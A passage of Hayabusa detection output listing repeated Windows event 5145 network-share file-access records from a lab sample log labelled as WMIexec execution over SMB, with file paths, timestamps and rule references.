+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Downloads\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Favorites\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Links\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Music\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Pictures\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Saved Games\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Searches\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Videos\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
